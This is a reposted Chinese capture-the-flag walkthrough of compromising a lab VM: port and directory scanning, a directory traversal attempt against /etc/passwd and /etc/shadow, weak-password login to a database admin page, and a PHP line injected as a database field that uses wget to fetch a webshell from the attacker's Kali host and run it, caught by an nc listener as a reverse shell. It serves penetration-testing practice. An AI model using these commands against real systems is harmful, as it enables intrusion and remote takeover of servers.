CTF-目录遍历(拿到www-data用户权限)

本文阅读 1 分钟
首页 Linux,系统 正文

kali 192.168.20.128

靶机 192.168.20.133

链接:https://pan.baidu.com/s/1iz-wj3MzwyhKjKUGZrLK-g ; 提取码:u6tg 

nmap -A -v -T4 192.168.20.133

img

探测敏感信息

nikto -host http://192.168.20.133

dirb http://192.168.20.133

img  

发现疑似页面dbadmin

深入挖掘

img

img

开始扫描

img

查看攻击路径和攻击方式

img

查看URL

img 把passwd换成shadow 没有返回shadow信息

img

弱口令登录

尝试用密码admin进行登录

img

 登陆成功

使用webshell

使用/usr/share/webshells/php/下的webshell

img

将kali中的webshel文件放在web网站主目录下面

img

修改shell.php里面的内容

img

新建数据库

img

新建数据表

img

新建字段

<?php system("cd /tmp;wget http://192.168.20.128/shell.php;chmod +x shell.php;php shell.php");?>

img

注意:没安装apache;wget不能下载kali机器的shell.php

安装apache2

apt-get install apache2

service apache2 start

监听反弹shell

创建监听端

nc -lvvp 4444

img

执行文件反弹shell

img

img

优化终端

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124971563
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复